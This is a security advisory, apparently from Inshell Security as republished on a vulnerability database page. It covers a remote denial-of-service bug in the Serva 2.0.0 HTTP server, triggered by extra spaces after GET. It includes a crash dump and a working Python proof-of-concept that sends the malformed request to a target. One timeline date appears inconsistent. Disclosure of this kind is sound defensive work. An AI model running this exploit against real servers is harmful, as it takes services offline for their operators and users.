Serva 2.0.0 HTTP Server Denial Of Service

2013.01.15
Credit: Julien Ahrens
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Serva Vendor URL: www.vercot.com Type: Uncaught Exception [CWE-248] Date found: 2012-12-07 Date published: 2013-01-14 CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- Serva 2.0.0, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in the HTTP module. The application uses a space delimiter to parse a GET Request. Adding more than one space (\x20) behind the GET will cause the application to crash with an unhandled c++ exception. (b50.18c): Unknown exception - code 000006d9 (first chance) (b50.a9c): C++ EH exception - code e06d7363 (first chance) (b50.a9c): C++ EH exception - code e06d7363 (!!! second chance !!!) eax=017d6668 ebx=00000000 ecx=00000000 edx=00000003 esi=017d66f0 edi=ffffffff eip=7c812afb esp=017d6664 ebp=017d66b8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 kernel32!RaiseException+0x53: 7c812afb 5e pop esi 5. PROOF-OF-CONCEPT (CODE / Exploit) ------------------------------------ #!/usr/bin/python import socket target="192.168.0.21" port=80 # 0000 47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d GET / HTTP/1.1. # 0010 0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39 .Host: http://19 # 0020 32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74 2.168.0.21..Cont # 0030 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d ent-Length: 0... # 0040 0a . payload = ( "\x47\x45\x54\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+ "\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+ "\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+ "\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+ "\x0a" ) print "[*] Connecting to Target " + target + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((target, port)) print "[*] Connected to " + target + "!" except: print "[!] " + target + " didn't respond\n" sys.exit(0) print "[*] Sending malformed request..." s.send(payload) print "[!] Exploit has been sent!\n" s.close() For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/34 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2012-12-07: Initial notification sent to vendor 2012-07-18: Vendor does not accept the bug 2013-01-14: Full Disclosure 8. REFERENCES ------------- http://security.inshell.net/advisory/34

References:

http://www.vercot.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top